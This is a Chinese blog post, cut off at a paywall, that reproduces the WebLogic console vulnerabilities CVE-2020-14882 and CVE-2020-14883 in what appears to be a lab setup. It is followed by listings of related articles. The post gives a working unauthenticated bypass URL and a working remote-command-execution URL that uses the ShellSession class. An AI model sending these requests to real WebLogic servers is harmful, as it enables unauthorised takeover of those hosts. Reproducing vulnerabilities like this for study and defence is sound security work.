Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

最新推荐文章于 2022-09-18 12:14:53 发布
原创 最新推荐文章于 2022-09-18 12:14:53 发布 · 3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

 漏洞复现:

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

 访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码:

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession

二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

<

最低0.47元/天 解锁文章
shayebudon
关注
【vulhub】Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882漏洞复现
qq_45300786的博客
04-10 492
https://www.cnblogs.com/backlion/p/13951858.html
使用未授权oracle赔偿,Weblogic未授权访问及命令执行分析复现(CVE-2020-14882/14883- 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou....
weixin_28975553的博客
04-15 458
‘%252E%252E%252F’即为二次URL编码过后的‘../’,通过这个就可以实现穿越路径未授权访问相关管理后台任意代码执行复现:利用上述未授权访问CVE-2020-14882结合CVE-2020-14883利用方式():通过:com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationCo...
CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞
weixin_45715461的博客
07-02 1592
CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞
vulhub漏洞Weblogic管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
weixin_45808483的博客
12-20 2969
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 漏洞环境
WeblogicCVE-2020-14882CVE-2020-14883管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6464
WeblogicCVE-2020-14882CVE-2020-14883管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
Weblogic 未认证远程命令执行CVE-2020-14882CVE-2020-14883
灰太的表格的博客
11-04 3782
Weblogic 未认证远程命令执行CVE-2020-14882CVE-2020-14883漏洞环境: vulhub 漏洞复现: CVE-2020-14882 允许远程用户绕过管理控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。 1.docker 开个环境: ...
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现(CVE202014882
weixin_39745933的博客
12-11 523
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
Weblogic Pre-Auth 远程命令执行CVE-2020-14882CVE-2020-14883
不曾扬帆,何以至远方
07-15 431
Weblogic Pre-Auth 远程命令执行CVE-2020-14882CVE-2020-14883
Weblogic Admin Console
weixin_33857679的博客
06-27 633
http://localhost:7001/console 转载于:https://www.cnblogs.com/davidgu/archive/2013/02/06/2901756.html
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1743
Weblogic
Weblogic Console监控 (上)
cosg6794的博客
11-24 341
JMSRuntime JMSServersCurrentCount 返回当前JMS服务的连接数 ConnectionsCurrentCount 返回本JMS服务器上当前的连接数 JMSServersHighCount 返回...
weblogic console 管理
czj4451的专栏
11-14 223
Oracle的开发工具JDeveloper自带了WebLogic。 1. web项目启动后,打开管理登录页面。输入用户名和密码: [img]http://dl2.iteye.com/upload/attachment/0075/5755/6bd14ccd-7419-3fa2-9a2e-419da1cb4e31.png[/img] 2. 登录成功后,可以对web服务器的各种资源进行...
weblogic console install
关雷
04-10 306
安装jdk 注意weblogic版本及其支持的jdk版本; 卸载OpenJDK,用命令rpm -qa|grep java 和 rpm -qa|grep jdk 显示所有jdk有关的安装包,然后用命令rpm -e --nodeps filename 将文件都删除 rpm -qa|grep java rpm -e --nodeps java-1.7.0-openjdk-1.7.0.45-2.4....
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7591
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值